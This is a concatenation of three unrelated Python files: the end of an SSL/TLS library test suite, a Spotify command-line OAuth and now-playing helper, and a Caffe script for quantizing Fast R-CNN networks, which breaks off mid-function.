bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
# PROTOCOL_SSLv2 is absent from OpenSSL builds that drop SSLv2.
if not hasattr(ssl, 'PROTOCOL_SSLv2'):
self.skipTest("PROTOCOL_SSLv2 needed")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
# SSLv23 negotiates, so every client protocol should succeed.
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = ("msg 1", "MSG 2", "STARTTLS", "MSG 3", "msg 4", "ENDTLS", "msg 5", "msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
# Tracks whether the connection is currently TLS-wrapped.
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if test_support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % repr(indata))
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
if (indata == "STARTTLS" and
outdata.strip().lower().startswith("ok")):
# STARTTLS ok, switch to secure mode
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, starting TLS...\n"
% repr(outdata))
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif (indata == "ENDTLS" and
outdata.strip().lower().startswith("ok")):
# ENDTLS ok, switch back to clear text
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, ending TLS...\n"
% repr(outdata))
s = conn.unwrap()
wrapped = False
else:
if test_support.verbose:
sys.stdout.write(
" client: read %s from server\n" % repr(outdata))
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write("over\n")
else:
s.send("over\n")
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = SocketServerHTTPSServer(CERTFILE)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
if test_support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://127.0.0.1:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
with test_support.check_py3k_warnings():
f = urllib.urlopen(url)
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if test_support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
f.close()
# The bytes fetched over HTTPS must match the file on disk.
self.assertEqual(d1, d2)
finally:
server.stop()
server.join()
def test_wrapped_accept(self):
"""Check the accept() method on SSL sockets."""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_SSLv23, ssl.CERT_REQUIRED,
CERTFILE, CERTFILE, ssl.PROTOCOL_SSLv23,
chatty=True, connectionchatty=True,
wrap_accepting_socket=True)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if test_support.verbose:
sys.stdout.write("\n")
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(indata)))
s.write(indata)
outdata = s.read()
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
# The echo server responds with the lower-cased payload.
if outdata != indata.lower():
self.fail(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def test_recv_send(self):
"""Test recv(), send() and friends."""
if test_support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray("\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray("\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
# Datagram-style methods are expected to fail on an SSL socket with a
# ValueError whose message names the method.
for meth_name, send_meth, expect_success, args in send_methods:
indata = data_prefix + meth_name
try:
send_meth(indata.encode('ASCII', 'strict'), *args)
outdata = s.read()
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While sending with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = data_prefix + meth_name
try:
s.send(indata.encode('ASCII', 'strict'))
outdata = recv_meth(*args)
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While receiving with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
# consume data
s.read()
s.write("over\n".encode("ASCII", "strict"))
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = test_support.bind_port(server)
started = threading.Event()
finish = False
# Server thread accepts TCP connections but never speaks TLS, so the
# client handshake can only end by timing out.
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c = ssl.wrap_socket(c)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_default_ciphers(self):
# A client restricted to weak DES ciphers must fail to negotiate
# against a server using the default cipher list.
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
sock = socket.socket()
try:
# Force a set of weak ciphers on our client socket
try:
s = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_SSLv23,
ciphers="DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with self.assertRaises((OSError, ssl.SSLError)):
s.connect((HOST, server.port))
finally:
sock.close()
self.assertIn("no shared cipher", str(server.conn_errors[0]))
# Resolve the certificate fixtures next to this file and run the test
# classes, gating networked/threaded suites on resource availability.
def test_main(verbose=False):
global CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, NOKIACERT
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
SVN_PYTHON_ORG_ROOT_CERT = os.path.join(
os.path.dirname(__file__) or os.curdir,
"https_svn_python_org_root.pem")
NOKIACERT = os.path.join(os.path.dirname(__file__) or os.curdir,
"nokia.pem")
if (not os.path.exists(CERTFILE) or
not os.path.exists(SVN_PYTHON_ORG_ROOT_CERT) or
not os.path.exists(NOKIACERT)):
raise test_support.TestFailed("Can't read certificate files!")
tests = [BasicTests, BasicSocketTests]
if test_support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = test_support.threading_setup()
if thread_info and test_support.is_resource_enabled('network'):
tests.append(ThreadedTests)
try:
test_support.run_unittest(*tests)
finally:
if _have_threads:
test_support.threading_cleanup(*thread_info)
# Script entry point: run the suite when executed directly.
if __name__ == "__main__":
test_main()
|
__init__.py | from threading import Thread
try:
# Python 3 modules
from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import urlencode
import urllib.parse as urlparse
except ImportError:
# Python 2 modules
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from urllib import urlencode
import urlparse
import base64
import time
import requests
import webbrowser
# Local redirect listener used by the OAuth authorization-code flow.
LISTENER_PORT = 9020
REDIRECT_URI = 'http://localhost:%d/' % LISTENER_PORT
# Spotify scopes needed to read playback state.
SCOPES = [
'user-read-currently-playing',
'user-read-playback-state'
]
# Minimal page served back to the browser after the redirect; it tries
# to close the window immediately.
RESPONSE_HTML = b"""
<html>
<head>
<title>Spotify CLI</title>
</head>
<body>
<script type="text/javascript">
window.close();
</script>
</body>
</html>
"""
# Spin up a one-shot local HTTP server to catch Spotify's OAuth redirect,
# open the browser for user consent, and return the ?code= value (or None
# if the redirect carried no code).
def get_authorization_code(client_id):
class AuthorizationHandler(SimpleHTTPRequestHandler):
last_code = None
def do_GET(self):
self.send_response(200, 'OK')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(RESPONSE_HTML)
# self.path is '/?query'; strip the leading '/?' before parsing.
parsed = urlparse.parse_qs(self.path[2:])
if 'code' not in parsed:
return
code = parsed['code'][0]
AuthorizationHandler.last_code = code
# shutdown() must run on another thread, or serve_forever deadlocks.
t = Thread(target=self.server.shutdown)
t.daemon = True
t.start()
def log_message(self, format, *args):
pass
server = HTTPServer(('localhost', LISTENER_PORT), AuthorizationHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.start()
authorize_user(client_id)
server_thread.join()
return AuthorizationHandler.last_code
# Send the user's browser to the Spotify consent page.
def authorize_user(client_id):
url = get_authorization_url(client_id)
webbrowser.open_new(url)
def get_authorization_url(client_id):
    """Build the Spotify /authorize URL for the authorization-code flow."""
    params = urlencode({
        'client_id': client_id,
        'response_type': 'code',
        'redirect_uri': REDIRECT_URI,
        'scope': ' '.join(SCOPES),
    })
    return 'https://accounts.spotify.com/authorize?' + params
def get_access_token(client_id, client_secret, code):
    """Trade an authorization *code* for tokens (authorization-code grant)."""
    grant = {
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
    }
    return request_access_token(client_id, client_secret, grant)
def refresh_access_token(client_id, client_secret, access_token):
    """Exchange the refresh token for new credentials once the old ones expire.

    Returns None while *access_token* is still within its 'expires_in'
    window; otherwise returns the stored token dict merged with the
    freshly issued fields.
    """
    age = int(time.time()) - access_token['time']
    if age < access_token['expires_in']:
        return None
    payload = {
        'grant_type': 'refresh_token',
        'refresh_token': access_token['refresh_token'],
    }
    refreshed = request_access_token(client_id, client_secret, payload)
    return dict(access_token, **refreshed)
# POST to the token endpoint with HTTP basic auth and stamp the response
# with the time of issue (consumed by refresh_access_token's expiry check).
def request_access_token(client_id, client_secret, payload):
url = 'https://accounts.spotify.com/api/token'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
r = requests.post(url, data=payload, headers=headers, auth=(client_id, client_secret))
r.raise_for_status()
return dict(r.json(), **{
'time': int(time.time())
})
def get_current_playing(access_token):
    """Return the currently-playing payload, or None when nothing is playing.

    A 204 from the endpoint means "no active playback"; any error status
    propagates as requests.HTTPError.
    """
    auth_value = access_token['token_type'] + ' ' + access_token['access_token']
    response = requests.get(
        'https://api.spotify.com/v1/me/player/currently-playing',
        headers={'Authorization': auth_value})
    response.raise_for_status()
    return None if response.status_code == 204 else response.json()
def format_current_playing(playing_data):
    """Render ``'artist1, artist2 [album] - track'`` for a playing payload."""
    track = playing_data['item']
    artist_names = ', '.join(artist['name'] for artist in track['artists'])
    return '%s [%s] - %s' % (artist_names, track['album']['name'], track['name'])
def format_artists(artists):
    """Join the artists' display names with ', '."""
    return ', '.join(artist['name'] for artist in artists)
|
quantize_pvalite-CLN3.py | #!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
def parse_args():
"""
Parse input arguments
"""
# Declarative option table; prints help and exits when run with no args.
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
    """Report which quantizable layer kinds appear in *net_proto*.

    Returns (has_conv, has_deconv, has_fc) booleans for Convolution,
    Deconvolution and InnerProduct layers respectively.
    """
    layer_types = [layer.type for layer in net_proto.layer]
    has_conv = 'Convolution' in layer_types
    has_deconv = 'Deconvolution' in layer_types
    has_fc = 'InnerProduct' in layer_types
    return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
# Rewrite a prototxt so every Conv/FC/Deconv layer uses its IVS/Ristretto
# quantized type with 32-bit dynamic-fixed-point defaults (16 fractional
# bits), and de-alias in-place blobs (top == bottom) by appending '/t'.
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
# Maps an original blob name to its most recent '/t'-suffixed alias.
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
# Same blob de-aliasing as convert_net_to_qnet, but configures Conv/FC
# layers for bit-accurate adder/multiplier analysis (analyze_mode = 3)
# with 32-bit accumulators and 16 fractional bits.
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
# Final BAC conversion: de-alias blobs and switch Conv/FC layers to their
# IVS types with analysis disabled (analyze_mode = 0, rounding_time = 1).
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
                    bw_layer_in, fl_layer_in,
                    bw_layer_out, fl_layer_out,
                    bw_params, fl_params,
                    bw_add, fl_add,
                    bw_multiply, fl_multiply):
    """Set every quantization bit-width/fractional-length field on the layer
    named *layer_name* and return the (mutated) *net_proto*.

    All widths are coerced to int; precision 0 selects dynamic fixed point.
    """
    for layer in net_proto.layer:
        if layer.name != layer_name:
            continue
        qp = layer.quantization_param
        qp.precision = 0  # DYNAMIC_FIXED_POINT
        qp.bw_layer_in = int(bw_layer_in)
        qp.bw_layer_out = int(bw_layer_out)
        qp.bw_params = int(bw_params)
        qp.bw_add = int(bw_add)
        qp.bw_multiply = int(bw_multiply)
        qp.fl_layer_in = int(fl_layer_in)
        qp.fl_layer_out = int(fl_layer_out)
        qp.fl_params = int(fl_params)
        qp.fl_add = int(fl_add)
        qp.fl_multiply = int(fl_multiply)
    return net_proto
def change_layer_BAC_bw(net_proto, layer_name,
                        bw_add, fl_add,
                        bw_multiply, fl_multiply):
    """Set the adder/multiplier bit-widths on the layer named *layer_name*.

    Fixes two NameError bugs in the original: the second parameter was
    misspelled ``lVayer_name`` while the loop compared against the
    undefined ``layer_name``, and the multiplier assignment read the
    undefined ``fw_multiply`` instead of ``fl_multiply``. Either made any
    call raise NameError, so the repaired names are strictly compatible.

    Returns the (mutated) *net_proto*.
    """
    for l in net_proto.layer:
        if l.name == layer_name:
            l.quantization_param.bw_add = bw_add
            l.quantization_param.fl_add = fl_add
            l.quantization_param.bw_multiply = bw_multiply
            l.quantization_param.fl_multiply = fl_multiply
    return net_proto
# Replace the bottom (input) blob list of the named layer.
# NOTE(review): direct assignment to a protobuf repeated field normally
# raises; presumably callers pass a compatible container or the field is
# plain Python here -- verify against usage.
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
# Replace the top (output) blob list of the named layer.
# NOTE(review): same caveat as change_layer_bottom_name about assigning
# to a protobuf repeated field -- verify against usage.
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net, layer):
    """Return the integer length (bits before the binary point, sign
    included) needed to represent the largest-magnitude weight or bias of
    *layer*.
    """
    params = net.params[layer.name]
    weights = params[0].data[...]
    largest = max(weights.max(), weights.min(), key=abs)
    if layer.convolution_param.bias_term:
        biases = params[1].data[...]
        extreme_bias = max(biases.max(), biases.min(), key=abs)
    else:
        extreme_bias = 0
    largest = max(largest, extreme_bias, key=abs)
    return math.ceil(math.log(abs(largest), 2)) + 1
def analyze_net_param_IL(net, net_proto):
    """Map each quantizable layer's name to the integer length its
    parameters require (see calc_layer_param_IL).
    """
    quantized_types = ('ConvolutionIVS', 'FcIVS', 'DeconvolutionRistretto')
    return {layer.name: calc_layer_param_IL(net, layer)
            for layer in net_proto.layer
            if layer.type in quantized_types}
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
    """Return the integer length needed for the blob named
    *layer_bottom_name* (sign bit included), based on its peak magnitude.
    """
    blob = net.blobs[layer_bottom_name].data
    peak = abs(max(blob.max(), blob.min(), key=abs))
    return math.ceil(math.log(peak, 2)) + 1
def analyze_net_output_IL(net, net_proto, imdb, max_per_image=100, thresh=0.05, vis=False):
    """Run detection over the whole image set and record, per quantizable
    layer, the integer length needed for its input and output activations.

    Args:
        net: caffe network whose blobs are inspected after each forward pass.
        net_proto: parsed NetParameter matching *net*.
        imdb: image database providing image paths (and roidb when no RPN).
        max_per_image, thresh, vis: accepted for signature compatibility with
            the surrounding test harness; not used directly here.
    Returns:
        (net_output_IL, net_input_IL): dicts keyed by layer name.
    """
    num_images = len(imdb.image_index)
    # Timer set mirrors the one used by the detection pipeline (im_detect).
    _t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
    if not cfg.TEST.HAS_RPN:
        roidb = imdb.roidb
    net_output_IL = dict()
    net_input_IL = dict()
    for layer in net_proto.layer:
        # In-place layers (top == bottom) would make the input and output
        # ranges indistinguishable, so they are rejected outright.
        assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
        #if layer.top[0] == layer.bottom[0]:
        #    print layer.name, layer.type
        if layer.type == 'ConvolutionIVS' \
            or layer.type == 'FcIVS' \
            or layer.type == 'DeconvolutionRistretto':
            # Seed with the smallest int so any measured range wins the max().
            net_output_IL[layer.name] = -sys.maxint - 1
            net_input_IL[layer.name] = -sys.maxint - 1
    for i in xrange(num_images):
        if cfg.TEST.HAS_RPN:
            box_proposals = None
        else:
            box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
        im = cv2.imread(imdb.image_path_at(i))
        # The forward pass populates every blob, so ranges can be read off.
        scores, boxes = im_detect(net, im, _t, box_proposals)
        for layer in net_proto.layer:
            if layer.type == 'ConvolutionIVS' \
                or layer.type == 'FcIVS' \
                or layer.type == 'DeconvolutionRistretto':
                # Track the worst case (widest range) over all images.
                net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
                net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
                #print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
    return net_output_IL, net_input_IL
# calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
    """Integer length needed by the layer's adder (accumulator).

    Reads the first two entries of the flattened top blob, where the
    bit-accurate (BAC) net exposes the adder extremes — presumably written
    there by the custom ConvolutionIVS/FcIVS layers (TODO confirm).
    """
    blob = net.blobs[layer_top_name].data
    flat = blob.reshape(blob.size)
